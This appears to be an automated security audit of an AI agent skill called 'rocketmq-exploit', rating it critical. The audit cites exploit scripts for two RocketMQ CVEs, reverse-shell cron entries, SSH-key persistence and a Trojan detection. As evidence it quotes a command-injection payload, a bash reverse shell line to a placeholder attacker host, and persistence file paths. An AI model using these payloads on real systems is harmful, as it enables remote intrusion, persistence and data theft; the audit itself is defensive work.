rocketmq-exploit

Fail

Audited by Gen Agent Trust Hub on Apr 22, 2026

Risk Level: CRITICAL
Tags: REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, EXTERNAL_DOWNLOADS, DATA_EXFILTRATION
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The skill provides ready-to-use Python exploit scripts for CVE-2023-33246 (Broker Command Injection) and CVE-2023-37582 (NameServer Arbitrary File Write). These scripts are designed to execute arbitrary code on remote targets.
  • Evidence: references/cve-2023-33246-broker-rce.md and references/cve-2023-37582-namesrv-write.md contain full exploit implementations.
  • [COMMAND_EXECUTION]: The skill contains specific payloads for executing bash commands on targets, including techniques to bypass restrictions and execute reverse shells.
  • Evidence: Payloads like rocketmqHome=-c $@|sh . echo <COMMAND>; and crontab entries for reverse shells (bash -i >& /dev/tcp/ATTACKER/PORT 0>&1) are documented.
  • [EXTERNAL_DOWNLOADS]: Instructions are provided to download and execute an external Java exploit tool (rocketmq-attack-1.1-SNAPSHOT.jar) from a third-party GitHub repository not associated with a trusted vendor.
  • Evidence: references/detection-and-tools.md references https://github.com/vulhub/rocketmq-attack/releases.
  • [DATA_EXFILTRATION]: Includes tools and methodology to leak sensitive cluster information from RocketMQ Dashboard and Broker instances without authentication.
  • Evidence: check_dashboard function in references/detection-and-tools.md specifically targets /cluster/list.query for information disclosure.
  • [PERSISTENCE]: The skill provides detailed methods for achieving persistence on a compromised system by writing SSH authorized keys or creating malicious cron jobs.
  • Evidence: Explicit examples for writing to /root/.ssh/authorized_keys and /var/spool/cron/root are provided in the usage sections.
  • [MALICIOUS_DETECTION]: Automated AV scanners confirmed that references/cve-2023-33246-broker-rce.md contains a Trojan (Python:Agent-RX [Trj]), and YARA scans detected reverse shell patterns in multiple files.
Recommendations
  • CRITICAL: 1 infected file(s) detected - DO NOT USE
  • AI detected serious security threats
Audit Metadata
Risk Level: CRITICAL
Analyzed: Apr 22, 2026, 10:08 AM